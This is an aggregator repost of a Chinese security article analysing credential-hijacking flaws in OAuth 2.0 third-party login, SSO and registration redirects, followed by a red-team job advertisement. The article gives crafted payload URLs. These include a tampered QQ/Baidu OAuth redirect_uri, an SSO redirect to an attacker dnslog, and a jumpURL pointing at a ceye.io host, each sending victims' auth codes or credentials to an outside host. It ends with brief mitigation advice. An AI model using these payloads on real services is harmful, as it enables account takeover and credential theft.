Sec Hotspot 首页  排行榜  收藏本站  技术博客  RSS
统计信息
已收录文章数量:18974 篇
已收录公众号数量:91 个
本站文章为爬虫采集,如有侵权请告知
已收录微信公众号
阿里云先知 网安寻路人 网信中国 区块链大本营 白说区块链 区块链投资家 区块链官微 区块链铅笔Blockchain HACK学习呀 二道情报贩子 合天智汇 小白帽学习之路 小米安全中心 弥天安全实验室 SAINTSEC SecPulse安全脉搏 TideSec安全团队 360安全卫士 游侠安全网 计算机与网络安全 安全祖师爷 安全学习那些事 腾讯安全联合实验室 黑客技术与网络安全 安全圈 腾讯御见威胁情报中心 Python开发者 Python之禅 编程派 Python那些事 Python程序员 安全威胁情报 吾爱破解论坛 行长叠报 安在 i春秋 嘶吼专业版 E安全 MottoIN 网信防务 网安杂谈 数说安全 互联网安全内参 漏洞战争 安全分析与研究 邑安全 ChaMd5安全团队 天融信阿尔法实验室 安全牛 SecWiki 安全学术圈 信安之路 漏洞感知 浅黑科技 Secquan圈子社区 奇安信集团 奇安信 CERT 国舜股份 雷神众测 盘古实验室 美团安全应急响应中心 瓜子安全应急响应中心 顺丰安全应急响应中心 蚂蚁金服安全响应中心 携程安全应急响应中心 滴滴安全应急响应中心 字节跳动安全中心 百度安全应急响应中心 腾讯安全应急响应中心 网易安全应急响应中心 OPPO安全应急响应中心 京东安全应急响应中心 Bypass CNNVD安全动态 安恒应急响应中心 天融信每日安全简报 奇安信威胁情报中心 看雪学院 黑白之道 水滴安全实验室 安全客 木星安全实验室 云鼎实验室 绿盟科技安全预警 白帽汇 深信服千里目安全实验室 腾讯玄武实验室 长亭安全课堂 FreeBuf 绿盟科技 nmask
凭证劫持漏洞分析
本文来自公众号:雷神众测   2019.08.08 18:41:17


声明

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。

雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。


1.1 漏洞危害

劫持凭证,构造链接登录受害者账号


1.2. 漏洞点类型

1. oauth2.0快捷登录
2. sso单点登录系统
3. 注册或者登录


1.3. oauth2.0快捷登录

很多厂商使用了OAuth2.0的认证方式

利用场景:1、主站可第三方登录,漏洞站是否第三方登录都无影响 2、一级域名下的某个信任域能够加载外部链接

这是第三方登录的接口:↓

https://graph.qq.com/oauth2.0/authorize?client_id=100312028&response_type=code&display=pc&state=1516604022&redirect_uri=https://passport.baidu.com/phoenix/account/afterauth?mkey=6f2d1d001e4be09e285ed6931751d0aa&scope=get_user_info,get_other_info,add_t,add_share

这个链接是第三方登录口:↓

https://passport.baidu.com/phoenix/account/afterauth?mkey=6f2d1d001e4be09e285ed6931751d0aa

现在分析参数:↓

state=1516604022
redirect_uri=https://passport.baidu.com/phoenix/account/afterauth?mkey=6f2d1d001e4be09e285ed6931751d0aa

redirect_uri参数:是要跳转到这个参数值网址。
在这里,我们将要跳转的网址替换到https://passport.baidu.com/phoenix/account/afterauth
?改为&

最后redirect_uri参数值是redirect_uri=带有外部链接的网址&mkey=6f2d1d001e4be09e285ed6931751d0aa
注:带有外部链接的网址是一级域名的信任域!

payload 发给目标的url:↓

https://graph.qq.com/oauth2.0/authorize?client_id=100312028&response_type=code&display=pc&state=1516604022&redirect_uri=带有外部链接的网址&mkey=6f2d1d001e4be09e285ed6931751d0&scope=get_user_info,get_other_info,add_t,add_share

目标只要打开该链接,并且点击头像登录。那么就会跳转到带有外部链接的网址

此时第三方登录会给用户一个code值,用户会带着code值去访问带有外部链接的网址 而带有外部链接的那个网址会自动加载外部链接,外部链接的作用就是获取referer 那么黑客就会获取到code值。

最后劫持登录的payload:↓ 访问第三方登录口

https://passport.baidu.com/phoenix/account/afterauth?mkey=868b9c0330c56e46a27c8da7f75708d1&code=获取到的code值&state=1516505635

再访问http://www.baidu.com成功登录目标账户


1.4. sso单点登录

单点登录(Single Sign On),简称为 SSO,是目前比较流行的企业业务整合的解决方案之一。SSO的定义是在多个应用系统中,用户只需要登录一次就可以访问所有相互信任的应用系统。

漏洞点:www.domain.com -> aaa.domain.com 当A用户登录了www.domain.com后,访问aaa.domain.com无需账号密码,sso会发送凭证给aaa.domain.com。

劫持:抓取sso发送给aaa.domain.com凭证的数据包,将跳转到aaa.domain.com这个值改为我们的dnslog地址。然后将这个链接发送给已经登录www.domain.com的A用户,那么A用户会往aaa.domain.com发送凭证,这时候就被我们的dnslog劫持了。


1.5. 注册登录

新用户注册或者用户登录的时候,网站会传递凭证给用户。这时候通过修改redirect_url为自己的dnslog,去劫持凭证

https://aaa.xxxxx.com/MxkEngine/mobilePage/xxdc_register_login/xxdc_login.html?jumpURL=http://www2.hg8l7g.ceye.io?aaa.xxxxx.com/MxkEngine/mobilePage/xxdc_issue/xxdc_ReceiveNoPayment.html?userid=#

成功跳转到www.*******.****.**(此处有打码)


1.6.修复建议

  1. 对跳转的url地址做限制。

  2. 加强域名后输入的字符长度,以及URL地址后的http以及.com.cn等域名字符的限制与安全过滤,对以及特殊的字符以及参数值也加强过滤,比如:redirect,jump,redurl,等参数值的过滤。

招聘启事

安全招聘

————————

公司:安恒信息

岗位:红蓝对抗 安全研究员

部门:战略支援部

薪资:13-35K

工作年限:2年+

工作地点:杭州(总部),广州,成都

工作环境:一座大厦,健身场所,医师,帅哥,美女,高级食堂…


岗位职责:


1.定期面向部门、全公司技术分享;

2.前沿攻防技术研究、跟踪国内外安全领域的安全动态、漏洞披露并落地沉淀;

3.负责完成部门渗透测试、红蓝对抗业务;

4.负责对安全漏洞进行跟踪、挖掘、并写出利用工具;

5.负责落地ATT&CK矩阵攻击、对抗技术 ;


岗位要求:


1.至少2-3年安全领域工作经验;

2.熟悉Linux/Windows操作系统原理;

3.拥有参与大型目标渗透攻防案例;

4.了解域环境、工作组知识概念,熟悉Windows认证原理;

5.熟悉TCP/IP协议,具有协议分析经验,能熟练使用各种协议分析工具;

6.熟悉各种攻防技术以及安全漏洞原理;

7.有过独立分析漏洞的经验,熟悉各种调试技巧,能熟练使用调试工具;

8.熟悉常见编程语言中的至少一种(C/C++、C#、Python、php、java)


加分项:


1.具备良好的英语文档阅读能力;

2.曾参加过技术沙龙担任嘉宾进行技术分享;

3.具有CISSP、CISA、CSSLP、ISO27001、ITIL、PMP、COBIT、Security+、CISP、OSCP等安全相关资质者;

4.具有大型SRC漏洞提交经验、获得年度表彰、大型CTF夺得名次者;

5.开发过安全相关的开源项目;

6.具备良好的人际沟通、协调能力、分析和解决问题的能力者优先;

7.个人技术博客;

8.在优质社区投稿过文章;


简历投递至 strategy@dbappsecurity.com.cn

PS:邮件主题中请注明工作意向城市


专注渗透测试技术

全球最新网络攻击技术

END



---

------

---------